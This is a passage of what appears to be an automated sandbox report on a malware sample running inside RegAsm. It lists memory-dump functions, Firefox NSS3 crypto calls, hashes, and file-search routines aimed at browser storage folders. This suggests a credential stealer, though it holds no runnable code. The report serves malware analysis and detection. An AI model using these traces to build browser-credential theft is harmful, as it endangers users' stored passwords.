                                                                                • String ID:
                                                                                • API String ID: 1441289343-0
                                                                                • Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                • Instruction ID: 6fe0abc9671094ebb78b5adae5ce845785b848c53fa933d6f836bd734e872211
                                                                                • Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                • Instruction Fuzzy Hash: 5721D4B1D007554BE700CF549D48BAB3768BFB130CF119269DD0C9B752F7B2E69882A2
                                                                                Function 6C8FACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CERT_NewCertList.NSS3 ref: 6C8FACC2
                                                                                  • Part of subcall function 6C8D2F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C8D2F0A
                                                                                  • Part of subcall function 6C8D2F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C8D2F1D
                                                                                  • Part of subcall function 6C8D2AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C8D0A1B,00000000), ref: 6C8D2AF0
                                                                                  • Part of subcall function 6C8D2AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C8D2B11
                                                                                • CERT_DestroyCertList.NSS3(00000000), ref: 6C8FAD5E
                                                                                  • Part of subcall function 6C9157D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C8DB41E,00000000,00000000,?,00000000,?,6C8DB41E,00000000,00000000,00000001,?), ref: 6C9157E0
                                                                                  • Part of subcall function 6C9157D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C915843
                                                                                • CERT_DestroyCertList.NSS3(?), ref: 6C8FAD36
                                                                                  • Part of subcall function 6C8D2F50: CERT_DestroyCertificate.NSS3(?), ref: 6C8D2F65
                                                                                  • Part of subcall function 6C8D2F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C8D2F83
                                                                                • free.MOZGLUE(?), ref: 6C8FAD4F
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                                                • String ID:
                                                                                • API String ID: 132756963-0
                                                                                • Opcode ID: 7e63b8d86086b669c3b86502ffc112c2c216a115de31be71e7a784817352014e
                                                                                • Instruction ID: 4cf8071f2b4093d838f273da2ccff48220e9da9a4b59aced1f32b4eb0b22d60b
                                                                                • Opcode Fuzzy Hash: 7e63b8d86086b669c3b86502ffc112c2c216a115de31be71e7a784817352014e
                                                                                • Instruction Fuzzy Hash: EB21F6B1D002188BEB20DF68DA055EEB7B4EF15259F064868D8147B700FB35AE5ACBE1
                                                                                Function 6C92ECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C92F0AD,6C92F150,?,6C92F150,?,?,?), ref: 6C92ECBA
                                                                                  • Part of subcall function 6C930FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C8D87ED,00000800,6C8CEF74,00000000), ref: 6C931000
                                                                                  • Part of subcall function 6C930FF0: PR_NewLock.NSS3(?,00000800,6C8CEF74,00000000), ref: 6C931016
                                                                                  • Part of subcall function 6C930FF0: PL_InitArenaPool.NSS3(00000000,security,6C8D87ED,00000008,?,00000800,6C8CEF74,00000000), ref: 6C93102B
                                                                                • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C92ECD1
                                                                                  • Part of subcall function 6C9310C0: TlsGetValue.KERNEL32(?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C9310F3
                                                                                  • Part of subcall function 6C9310C0: EnterCriticalSection.KERNEL32(?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C93110C
                                                                                  • Part of subcall function 6C9310C0: PL_ArenaAllocate.NSS3(?,?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C931141
                                                                                  • Part of subcall function 6C9310C0: PR_Unlock.NSS3(?,?,?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C931182
                                                                                  • Part of subcall function 6C9310C0: TlsGetValue.KERNEL32(?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C93119C
                                                                                • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C92ED02
                                                                                  • Part of subcall function 6C9310C0: PL_ArenaAllocate.NSS3(?,6C8D8802,00000000,00000008,?,6C8CEF74,00000000), ref: 6C93116E
                                                                                • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C92ED5A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                                                • String ID:
                                                                                • API String ID: 2957673229-0
                                                                                • Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                • Instruction ID: 4750776ed548dd31637aade8b16bfb0f6b6aa45c55f3eda2f18e3dac390ba671
                                                                                • Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                • Instruction Fuzzy Hash: 2E21D1B1A107429BE700CF25D984B52B7E4BFA5309F25C219E81C8BA61EB74E594C6D0
                                                                                Function 6C95EDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C947FFA,?,6C949767,?,8B7874C0,0000A48E), ref: 6C95EDD4
                                                                                • realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C947FFA,?,6C949767,?,8B7874C0,0000A48E), ref: 6C95EDFD
                                                                                • PORT_Alloc_Util.NSS3(?,00000000,00000000,6C947FFA,?,6C949767,?,8B7874C0,0000A48E), ref: 6C95EE14
                                                                                  • Part of subcall function 6C930BE0: malloc.MOZGLUE(6C928D2D,?,00000000,?), ref: 6C930BF8
                                                                                  • Part of subcall function 6C930BE0: TlsGetValue.KERNEL32(6C928D2D,?,00000000,?), ref: 6C930C15
                                                                                • memcpy.VCRUNTIME140(?,?,6C949767,00000000,00000000,6C947FFA,?,6C949767,?,8B7874C0,0000A48E), ref: 6C95EE33
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                • String ID:
                                                                                • API String ID: 3903481028-0
                                                                                • Opcode ID: aa86a2b93993629d0c4a17e92787e53cdee4303e167764287d3f49d5aae14858
                                                                                • Instruction ID: 09dfce01a372b58e0be7d8c868df60f6944e0842a0f4ab8c6464eb0c7c77abe8
                                                                                • Opcode Fuzzy Hash: aa86a2b93993629d0c4a17e92787e53cdee4303e167764287d3f49d5aae14858
                                                                                • Instruction Fuzzy Hash: 2111C2B1A11716ABEB10DE65DC84B16B3ACEF1435CF644531E91986A00E33AF878C7E1
                                                                                Function 6C7CB4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 6C7CB4F5
                                                                                • AcquireSRWLockExclusive.KERNEL32(6C83F4B8), ref: 6C7CB502
                                                                                • ReleaseSRWLockExclusive.KERNEL32(6C83F4B8), ref: 6C7CB542
                                                                                • free.MOZGLUE(?), ref: 6C7CB578
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                • String ID:
                                                                                • API String ID: 2047719359-0
                                                                                • Opcode ID: 1df04530a6880dabbaf09826556a96e6803c831eed9239ad76563aeaf6537a5a
                                                                                • Instruction ID: abda519f69c7fc9abbadb39d0c748f1046971d93a464b2604c0cc388c33e5cb5
                                                                                • Opcode Fuzzy Hash: 1df04530a6880dabbaf09826556a96e6803c831eed9239ad76563aeaf6537a5a
                                                                                • Instruction Fuzzy Hash: 3411D530A04B42CBD3318F69D604762B3B4FF96319F106B6AE84957A02EBB1B5C5C7D1
                                                                                Function 6C8F8DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                • String ID:
                                                                                • API String ID: 284873373-0
                                                                                • Opcode ID: d1e9e34929b7a0613b547b6892edcd3764e8f31dcf2a9be4299916cea8b843d7
                                                                                • Instruction ID: 64e10232d229333af69c8721f9f1e1795fab9c646568b6a5bfb34b36d6f14b3e
                                                                                • Opcode Fuzzy Hash: d1e9e34929b7a0613b547b6892edcd3764e8f31dcf2a9be4299916cea8b843d7
                                                                                • Instruction Fuzzy Hash: 7D118FB1605A159BD710AF78C6481A9BBF4FF06354F014929DC98DBB00E734E855CBD2
                                                                                Function 6C97AC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C965F17,?,?,?,?,?,?,?,?,6C96AAD4), ref: 6C97AC94
                                                                                • PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C965F17,?,?,?,?,?,?,?,?,6C96AAD4), ref: 6C97ACA6
                                                                                • free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C96AAD4), ref: 6C97ACC0
                                                                                • free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C96AAD4), ref: 6C97ACDB
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: free$DestroyFreeK11_Monitor
                                                                                • String ID:
                                                                                • API String ID: 3989322779-0
                                                                                • Opcode ID: 727a83ce4f5ec1979d95eacbd9345e8397bcf120e3a72b8a0d706e055a358107
                                                                                • Instruction ID: 371bff513e4ae1331b5b880e952c7046c587179d46182e527e4b93726bdcfd4b
                                                                                • Opcode Fuzzy Hash: 727a83ce4f5ec1979d95eacbd9345e8397bcf120e3a72b8a0d706e055a358107
                                                                                • Instruction Fuzzy Hash: BD0180B1601B169BE720DF29D905753B7E8BF00669B084839D85AC3E00EB34E015CBE1
                                                                                Function 00419049 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                • String ID:
                                                                                • API String ID: 3016257755-0
                                                                                • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                • Instruction ID: 6c12d003c91e958138eed580c0154e496b93e037388a0c8d124b30f15893669d
                                                                                • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                • Instruction Fuzzy Hash: 1911403644014AFBCF225E95CC11CEE3F62BB1C354B58845AFE2959131D73AC9B2AB89
                                                                                Function 6C97AC00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PK11_FreeSymKey.NSS3(?,6C965D40,00000000,?,?,6C956AC6,6C96639C), ref: 6C97AC2D
                                                                                  • Part of subcall function 6C91ADC0: TlsGetValue.KERNEL32(?,6C8FCDBB,?,6C8FD079,00000000,00000001), ref: 6C91AE10
                                                                                  • Part of subcall function 6C91ADC0: EnterCriticalSection.KERNEL32(?,?,6C8FCDBB,?,6C8FD079,00000000,00000001), ref: 6C91AE24
                                                                                  • Part of subcall function 6C91ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C8FD079,00000000,00000001), ref: 6C91AE5A
                                                                                  • Part of subcall function 6C91ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C8FCDBB,?,6C8FD079,00000000,00000001), ref: 6C91AE6F
                                                                                  • Part of subcall function 6C91ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C8FCDBB,?,6C8FD079,00000000,00000001), ref: 6C91AE7F
                                                                                  • Part of subcall function 6C91ADC0: TlsGetValue.KERNEL32(?,6C8FCDBB,?,6C8FD079,00000000,00000001), ref: 6C91AEB1
                                                                                  • Part of subcall function 6C91ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C8FCDBB,?,6C8FD079,00000000,00000001), ref: 6C91AEC9
                                                                                • PK11_FreeSymKey.NSS3(?,6C965D40,00000000,?,?,6C956AC6,6C96639C), ref: 6C97AC44
                                                                                • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6C965D40,00000000,?,?,6C956AC6,6C96639C), ref: 6C97AC59
                                                                                • free.MOZGLUE(8CB6FF01,6C956AC6,6C96639C,?,?,?,?,?,?,?,?,?,6C965D40,00000000,?,6C96AAD4), ref: 6C97AC62
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                • String ID:
                                                                                • API String ID: 1595327144-0
                                                                                • Opcode ID: 50cfcac28e42bcee2314aabfd748a90a134d482592a43fbf913255ba6c11a7a6
                                                                                • Instruction ID: 67204a1f24af02b334728da0bb30b5edce04c90009dfcad5039d37862164bef1
                                                                                • Opcode Fuzzy Hash: 50cfcac28e42bcee2314aabfd748a90a134d482592a43fbf913255ba6c11a7a6
                                                                                • Instruction Fuzzy Hash: BC018FB56016049FDB10CF14E8C1B4677ACAF24B1CF188068E8498F706DB34E808CBB1
                                                                                Function 0040FA9C Relevance: 6.0, APIs: 4, Instructions: 45stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                • lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                • lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologlstrcatlstrcpylstrlen
                                                                                • String ID:
                                                                                • API String ID: 809291720-0
                                                                                • Opcode ID: 39667344f9101b2b7fe644fc43952dc8d56ac4cd1daba7bc967c80c1a343ed11
                                                                                • Instruction ID: 38bc537ac666268100f5265c1d729237def4eef846b7224f466c0159986bfced
                                                                                • Opcode Fuzzy Hash: 39667344f9101b2b7fe644fc43952dc8d56ac4cd1daba7bc967c80c1a343ed11
                                                                                • Instruction Fuzzy Hash: 90015AB6900215EFDB209F99D88499AFBF5FF48314B10883EE999E3610C775A944CF50
                                                                                Function 6C9ECC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalDeleteSectionfree
                                                                                • String ID:
                                                                                • API String ID: 2988086103-0
                                                                                • Opcode ID: 5bb1c3dccdb3fbe0e858fa05171f22e4fc951f1684e57c1ddd182fdae812ece3
                                                                                • Instruction ID: 76ee3d34a4f66d3a8d8f4d4f5b8dfc3b0d408d7239d1a2fa2cbd09ff5269d1e3
                                                                                • Opcode Fuzzy Hash: 5bb1c3dccdb3fbe0e858fa05171f22e4fc951f1684e57c1ddd182fdae812ece3
                                                                                • Instruction Fuzzy Hash: 3AE030767007199BDE10EFA8DC4489677ACEE492743194525E691C3700D235F905CBE1
                                                                                Function 0040AFAF Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040AFB4
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                                  • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425C4E,?,?), ref: 00410CF6
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 0040A981: _EH_prolog.MSVCRT ref: 0040A986
                                                                                  • Part of subcall function 0040A981: wsprintfA.USER32 ref: 0040A9AF
                                                                                  • Part of subcall function 0040A981: FindFirstFileA.KERNEL32(?,?), ref: 0040A9C6
                                                                                  • Part of subcall function 0040A981: StrCmpCA.SHLWAPI(?,00425EE4), ref: 0040A9E3
                                                                                  • Part of subcall function 0040A981: StrCmpCA.SHLWAPI(?,00425EE8), ref: 0040A9FD
                                                                                  • Part of subcall function 0040A981: lstrlenA.KERNEL32(00000000,00425C2A,00000000,?,?,?,00425EEC,?,?,00425C27), ref: 0040AAAD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$lstrcpy$Filelstrcatlstrlen$AttributesFindFirstwsprintf
                                                                                • String ID: .metadata-v2$\storage\default\
                                                                                • API String ID: 2418158533-762053450
                                                                                • Opcode ID: f9589811858bd53b6f2c56ef5cb768d1ec6d44e1cf31d85bf6b84f01be8c7b91
                                                                                • Instruction ID: 169141139e08e17bd9d9f82fa4a2ec5826fa215f6f172615a64578a92b691924
